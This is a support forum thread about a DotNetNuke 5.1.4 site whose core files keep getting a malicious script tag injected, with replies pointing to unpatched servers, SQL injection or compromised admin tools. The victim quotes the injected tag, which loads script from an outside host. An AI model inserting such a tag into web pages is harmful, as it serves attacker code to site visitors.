Hello,

I am running DNN 5.1.4. My site was injected with some script. I refreshed my site with new install this morning and it got hacked again. Somehow someone is injecting this line :

<script src=http://melstra-techniek.nl/images/contact.php ></script>

Any idea how to stop this? All Core DNN files and js are getting injected.

Hello,

There are no known issues with 5.1.4 and we have no other reports of similar issues, so I suspect this is unlikely to be DotNetNuke related.

You can email the details to security@dotnetnuke.com, and we can look into it further, but if every similar case the issue has been tracked down to

a) missing OS/IIS patches - please ensure that your server is up to date (run windows update)

b) SQL Injection , typically from a 3rd party module or non-DotNetNuke website on the same server - http://www.dotnetnuke.com/Community/Blogs/tabid/825/EntryId/1930/is-DotNetNuke-vulnerable-to-sql-injection.aspx

c) a hacked shared utility such as an old version of Helm/Plesk (website administration tools)

That's a typical script hack, and likely not related to DNN.  It's much more likely that your IIS or Windows Server isn't patched or yopu have an open FTP access somewhere.
